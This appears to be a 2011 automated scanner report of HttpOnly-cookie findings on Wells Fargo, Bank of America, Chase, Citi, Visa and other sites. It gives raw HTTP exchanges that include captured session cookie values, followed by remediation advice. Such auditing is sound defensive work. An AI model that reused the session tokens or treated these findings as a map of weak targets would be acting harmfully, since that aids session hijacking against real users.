<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sitemap HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:30:01 GMT Content-length: 11525 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=BTp2NJhLsKNhHMTBQmCnJr9FVstXChTLdy3nnj71Z2LlVfPHnRfH!-1672152970; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2331269898.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Sitemap</title> <meta name=" ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /student/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:44 GMT Content-length: 11102 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=6TvRNJhY125zTwF4f6Qfyy7MFhjnl1ynTFX1D79WTJGDGWP1JHHW!1758734416; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2230606602.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /student/loans/apply HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:45 GMT Location: https://www.wellsfargo.com/student/apply Set-Cookie: wcmcookiewf=Pvs8NJhZRksHLhJMnlf8LRvg31mfhM3JhG2tbcvt12x61nL1LDcq!854257767; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/student ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /theprivatebank/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:52 GMT Content-length: 10631 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=STpMNJhQDybSSxHpfhJTFJbY0kNSfpnGW0Fr1nv1mPTTvFqV112n!805790998; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2499042058.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wachovia HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:16 GMT Content-length: 9975 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=3SppNJhcnv0hcQFv6dfXLt0v608QpNnhXmnDLfJKH2M4Rnc1Bvrg!349572437; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wachovia/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:16 GMT Content-length: 9975 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=PTvJNJhcrLjppxSd5CbQ8FhVRPVSLn2Kfk1RZTbVT3krLTx1rHxF!-1341910901; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2381601546.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wachovia/autoloans/index HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:12 GMT Content-length: 4590 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=xppZNJhY7LvrJcpTHmP3cLJpZ1LLPmJkQcPqxfFd8Jckb76K9Gqk!457746116; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wachovia/insurance HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:13 GMT Content-length: 5083 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=HytTNJhZ4qF17hkd05bFxvjm5pjLJZ9SDp232hnZzlBSfDqphjTm!524336973; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2666814218.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wachovia/wealthmanagement/index HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:16 GMT Content-length: 4878 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=dxGyNJhbxRKXvmT8XrCKRL6C9YBQ3p3ySlqlWCRgYtL9pkZny1NT!1893615402; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1727290122.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wachovia to Wells Fargo Inter ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wf/product/apply HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:59 GMT X-Cnection: close Location: https://www.wellsfargo.com:443/customerApp/product/apply Set-Cookie: wcmcookiewf=s4dGNJhHTLYKQd31wnpL6N3j4P7bSHpcqpvSv2FCsqkGdJJv959t!457746116; domain=.wellsfargo.com; path=/; secure Content-Language: en Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com:443/cus ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wfonline/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:31 GMT Content-length: 10682 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=LFLMNJhLFspBQNbCyRYTSn9pmtPgVnCyNmJyyp061QdHMd9nSSHJ!-231273820; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2113166090.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wfonline/bill_pay/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:32 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=Hn32NJhMGlNPQpv5W4QlN8XHcN1XlnXBjNr1nj2CLZHRGdv7pWzW!349572437; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Online - Bill Pay< ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /results?q=ipboard+software&um=1&ie=UTF-8&sa=N&hl=en&tab=w1 HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /watch HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 303 See Other Date: Thu, 03 Feb 2011 01:17:43 GMT Server: wiseguy/0.6.7 Content-Length: 0 X-Content-Type-Options: nosniff Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com Set-Cookie: VISITOR_INFO1_LIVE=XJ-WTjH7UMA; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 01:17:43 GMT Set-Cookie: GEO=61c81e28805bccac540fef7fe21d6dafcwsAAAAzVVOtwdbzTUoCNw==; path=/; domain=.youtube.com Expires: Tue, 27 Apr 1971 19:44:06 EST Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Location: http://www.youtube.com/das_captcha?next=http%3A%2F%2Fwww.youtube.com%2Fwatch&ytsession=tPkJgKGgiVxR6VkyDxY0jMxu78qvhsjgoVr5s_OceJDQL_gh8WA3DK0wRe7SuQUcEQAF3en5aCBxUZe2i0H_Uofu5XRfNzNbj2jrlPvXTLDTPY8C_VQ_zsdHASZNpsQr-KXA7tSvZWfgU_4a1hlfLTkjpIknV7Cl1-2DLxGPithWt5ElD7hFmCXFR8gZVhBZOSKLuqeNRgqcMWiQeKdObub0ZNOc-1n1VomUbzwuBxm29IkoaDB3UA_wKtjbqiJ_amyjAQEZhbJaIA8HZAcU4ENpdzK6ncp3ZJ01PYBydW7KX5cIkc2Zvw Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /promos/jump/greatdeals/ HTTP/1.1 Host: www2.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:30:12 GMT Content-type: magnus-internal/cold-fusion Set-Cookie: SMIDENTITY=0UqbHxrdFB+IZK/yIQDzBx9SGv6BGzL7lzH4+m2m5Ag/SL9g3npRFfVI6KIEmu0/Hod7q4EuA6oQzDdS85o0coYHleZFid+LBGvSY5uZLDygIZeae1UW2VBI88kvQSWsFmOlVn5ZEmIo2pN8snUAFivEWp9gsATazmwhZjY9EzqSNnEBTOjkBSSYcTUyCwY3NSVzGO93DWb469Ts3G/FPGczX6tRnbWL6wLVjkb8afFGuYjisfHuVsWpgdMI5dnkNoJ77iZMPx7Ff3x7H4Um8dmvEOCfQ82H3QQmiLdgmuMYSmX2E4DMfhH+mVL8nqqXb1tWI4F55ChQZPtkyefbEs1rNkirDxvvGe2qQe33bFK1n6kE4VHyP8PFs6toDIGPr26lPotHq/TiTLqEm2Tm6b3uxs/3VLAjG9MoImDw/AfxTngVEJ7x9tafVeZOmteLNMr255a5XDiYVNFUeFQqVHqg8rSJii6JhV2ShUOawB6iMsk690ww5mVHKkPF1lMW; path=/; domain=.bankofamerica.com; secure Location: http://www.bankofamerica.com/promos/jump/greatdeals2/?dbgredir= Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /planning/investments.action HTTP/1.1 Host: www6.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /overview/overview.asp HTTP/1.1 Host: careers.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:01:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 40467 Content-Type: text/html Set-Cookie: ASPSESSIONIDAQSBBASC=BDAGOJOAAKJHPBJKHEJODHFO; path=/ Cache-control: private
<!-- Header --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Desc ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /career/careerhome HTTP/1.1 Host: careers.jpmorganchase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 00:08:20 GMT Cache-Control: no-cache="set-cookie" Content-Type: text/html; charset=UTF-8 HOST_SERVICE: FutureTenseContentServer:6.3.0 Set-Cookie: JpmcSession=TzkVNJxJQrS0gzJv15V8Vrx2QzN9B6kLwsGv8cCv6MNQVGfj6sk1!-872331758; path=/ X-Powered-By: Servlet/2.4 JSP/2.0 P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="../CSS/code/white4.css" re ...[SNIP]...
v1st=5BE36DBE8BA5F8DB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: chaseonline.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 17909 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=363a4a0a-9240-4195-9a73-ca0f1962dd7b; domain=.chase.com; path=/ Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=5BE36DBE8BA5F8DB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:02:00 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta http-equiv="Pragma" content="no-cache"/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licence/1043255/script.cgi?lang=en&groups=0 HTTP/1.1 Host: chat.livechatinc.net Proxy-Connection: keep-alive Referer: http://www.invisionpower.com/products/board/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-type: application/x-javascript; Set-Cookie: lc_session=S1296685494.aa93f77b42&lc_last_visit=1296685494&lc_visit_number=1&lc_page_view=1&lc_nick=$&lc_chat_number=0&lc_all_invitation=0&lc_ok_invitation=0&lc_last_operator_id=$&lc_client_version=$&lc_last_conference_id=$&lc_lang=en; expires=Fri, 01-Feb-2013 23:24:54 GMT; domain=chat.livechatinc.net; P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 11722 Connection: Keep-Alive
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: corporate.visa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookies were issued by the application and do not have the HttpOnly flag set:
TestSess3=70221296686701068830717;path=/
CoreID6=70221296686701068830717; path=/; expires=Sun, 01 Feb 2026 22:45:01 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cm HTTP/1.1 Host: data.coremetrics.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Wed, 02 Feb 2011 22:45:01 GMT Server: Apache P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA" Set-Cookie: CoreID6=70221296686701068830717; path=/; expires=Sun, 01 Feb 2026 22:45:01 GMT Set-Cookie: TestSess3=70221296686701068830717;path=/ Location: /cm?cvdone=p Keep-Alive: timeout=300, max=988 Connection: Keep-Alive Content-Type: text/plain; charset=UTF-8 Content-Length: 0
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fis/worldnews/worldnews.asp HTTP/1.1 Host: fis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 00:54:33 GMT Connection: close Content-Length: 83533 Content-Type: text/html Set-Cookie: ASPSESSIONIDCASTCAST=LKGBFPGBNACCBLIDDPHBHANM; path=/ Cache-control: private
<html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta http-equiv="refresh" content="1800"> <title>FIS - Worldnews - Icelandic Group still up for grabs</title ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /icg/global_banking/index.jsp HTTP/1.1 Host: icg.citi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: "" Date: Wed, 02 Feb 2011 22:11:31 GMT Content-type: text/html; charset=ISO-8859-1 Cache-Control: no-cache="Set-Cookie" Set-Cookie: JSESSIONID=pmRyNJWTrlhWs4CMfhxWwsp80LHT4LhB6XJg6bHB5JvPWnb5GRyz!-455328445; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /icg/global_markets/index.jsp HTTP/1.1 Host: icg.citi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: "" Date: Wed, 02 Feb 2011 22:11:31 GMT Content-type: text/html; charset=ISO-8859-1 Cache-Control: no-cache="Set-Cookie" Set-Cookie: JSESSIONID=hKTpNJWTyzHxTpySqDY5L1tn7Xt0pH1zvGG6h2GrTDnnCgT2GD8y!-455328445; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /japan-news/1671/tuna-costs-254-000-in-japan/ HTTP/1.1 Host: insidejapantours.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: CSPSESSIONID-SP-80=00000001000039bv9MU3000000HVqGoe$mkIhY9X0_5aueuw--; path=/; CACHE-CONTROL: no-cache CONNECTION: Close DATE: Thu, 03 Feb 2011 01:02:54 GMT EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT PRAGMA: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <link rel="alternate" type="application/rss+xml" title="Japan ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=kvc2qv4jlhknajb7ks0pmmn6m3; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: ipboard-software.software.informer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Thu, 03 Feb 2011 01:02:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=kvc2qv4jlhknajb7ks0pmmn6m3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 17619
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
